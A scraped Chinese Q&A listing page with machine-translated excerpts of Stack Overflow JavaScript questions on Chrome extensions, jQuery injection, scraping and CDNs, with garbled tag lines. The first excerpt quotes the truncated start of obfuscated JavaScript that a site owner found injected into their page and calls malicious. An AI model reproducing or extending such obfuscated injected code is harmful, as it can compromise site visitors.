草庐IT

网站开发

全部标签

javascript - 我网站中的恶意 javascript 代码

我在我的网站源代码中找到了这段代码:var_0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"];var_0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]];var_0xcd6e=[_0x9ae4[5],_0x9ae
javascript0x9aesectionobfuscation

javascript - 在 Chrome 扩展中从 JavaScript 调用网站 API 时出现跨域错误

我正在开发一个小型Chrome扩展程序,它将调用RemembertheMilkAPI。谷歌有一个goodexample使用FlikrAPI,我将其用作扩展的基础。他们的示例在我的浏览器(Linux上的最新Chrome)中完美运行。但是,当我换出RemembertheMilkAPI方法名称和APIkey时,出现以下错误:XMLHttpRequestcannotloadhttp://api.rememberthemilk.com/services/rest/?method=rtm.test.echo&api_key=xxxxxxxxxxxxxxxxxxxxxx&name=Test%20ta
时出javascript34codesectiongoogle-chrome

javascript - 可以使用 Ruby on Rails 开发 google chrome 扩展吗?

我不确定为什么它告诉我这个问题是主观的。我在整个互联网上都看过,找不到答案。我知道谷歌浏览器扩展的内容脚本通常是用javascript编写的。这和Ruby之间有什么联系?我知道Rails是Ruby的Web开发框架。我只是在学习所有这些东西。 最佳答案 RubyonRails是Ruby语言的服务器端代码框架。Chrome扩展是用纯Javascript编写的。两人永远不会见面。您可能想使用CoffeeScript,它是一种类似Ruby的语言,已转换为Javascript。(我从未尝试在其中编写Chrome扩展程序,但我认为它会正常工作)
javascriptgooglesectionRuby编写ruby-on-railsgoogle-chrome-extension

javascript - Chrome 开发者工具控制台 - 日志堆叠,如何查看重新记录的内容 [内部屏幕截图]?

我刚刚开始使用Chrome开发者工具中的控制台(一般来说对Javascript来说还是个新手)。我注意到,当我连续两次记录同一个变量(在本例中是一个对象)时,日志会堆叠它并在它旁边放置一个小数字图标。我点击这个以为我将能够看到该对象两次(因为它已经更新了两次),但是没有任何反应。更多说明图片:如您所见,Object下拉列表旁边的蓝色圆圈中有一个小“2”。第一个日志在3处有Object.num,第二个在4处,但是我只能看到第二个。任何关于如何查看两个日志的答案都将不胜感激。:). 最佳答案 发生这种情况是因为您两次记录同一个对象。即使
新记录堆叠sectioncodejavascriptgoogle-chromeconsole

javascript - jquery 只从开发工具控制台返回第一个输入元素

我有以下html:................我想选择所有的输入元素,但是当我输入时:$("input")在chromedevtools控制台中,我只得到第一个元素:我可以输入什么来获得输入元素的完整列表? 最佳答案 这不是一个愚蠢的问题。这实际上是Chrome开发者工具带来的困惑行为。这里发生的事情是您没有包含JQuery。GoogleChrome在Chrome开发者工具中提供了变量/函数$。它与jQuery不同。这是关于它的文档:https://developers.google.com/chrome-developer-t
开发工具javascript34codesectionjquery

javascript - Web 抓取具有动态 javascript 内容的网站

所以我使用python和beautifulsoup4(我没有绑定(bind))来抓取网站。问题是当我使用urlib获取页面的html时,它不是整个页面,因为其中一些是通过javascript生成的。有什么办法可以解决这个问题吗? 最佳答案 基本上有两个主要选项可以继续:使用浏览器开发工具,查看哪些ajax请求将加载页面并在脚本中模拟它们,您可能需要使用json将响应json字符串加载到python数据结构中的模块使用selenium等工具打开一个真正的浏览器。浏览器也可以是“headless”的,参见HeadlessSelenium
javascriptWebsectionnoreferrerpythonweb-scrapingbeautifulsouphtml-parsing

javascript - 如何在开发者控制台中使用 Chrome 注入(inject) jQuery?

问题我曾经能够(在本地)使用以下两个Chrome扩展中的任何一个来轻松地将jQuery注入(inject)到还没有jQuery的页面中,并且我没有拥有(客户端)来试验设计更改、开发修改和实时故障排除:jQueryInjector-ChromeWebStorejQueryEverywhere-ChromeWebStore不幸的是,现在由于防止“XSS”(跨站点脚本)的最新热潮,这些插件不再有效。这些变化背后可能有一个崇高的目的,我只是想了解发生了什么变化。我认为这与“内容安全策略”有关,我最近才听说,对此知之甚少。我第一次知道XSS是2011年的浏览器问题,但是之前XSS的防范措施从来没
何在javascriptnoreferrernoopenernofollowjquerydependency-injectiongoogle-chrome-devtools

javascript - "{} === null"在开发者控制台抛出语法错误

这个问题在这里已经有了答案:Why{}!=({})inJavaScript?(2个答案)关闭9年前。为什么当我在控制台中输入{}===null时它抛出SyntaxError:Unexpectedtoken===null==={}按预期给出false。
javascriptampsectionnoticecodesyntax-error

javascript - 从 CDN 获取 jquery.min.js 或其他资源时,CDN 是否知道客户端正在访问哪个网站?

CDN能否通过跟踪我网站的访问者或他们下载所需的库而不共享他们访问的页面的URL来创建某种统计数据? 最佳答案 是的,他们知道请求资源的页面的URL(例如,通过查看Refererheader)。因此他们可以跟踪哪些网站请求了特定资源。唯一的异常(exception)是当HTTPS页面通过非安全连接请求资源时。在那种情况下,Referer不会被设置,但是Originheader无论如何都会有一些帮助。当然可以跟踪单个用户,但由于多种原因这是不切实际的:CDN资源本应由浏览器进行大量缓存,因此它们将针对许多不同的页面浏览请求和下载一次,
javascriptCDNsection

javascript - 开发页面时需要什么JavaScript?

我开发网站已有一段时间了,我几乎不在我的页面中使用任何Javascript。无论我想用JavaScript做什么,都可以通过PHP实现。就像ajax本身一样。我们可以发送常规请求而不是ajax请求,不是吗?我们可以使用“include”来包含页面的子部分。所以我是否遗漏了一些我不知道的关于javascript的东西? 最佳答案 Javascript的要点在于它是一种客户端技术。它允许您在浏览器而不是服务器上执行操作。简单示例-您想让用户输入一些数字,然后对这些数字执行一些计算并显示结果。使用Javascript,这一切都将发生在浏览
javascriptsectionstackoverflowweb
15161718192021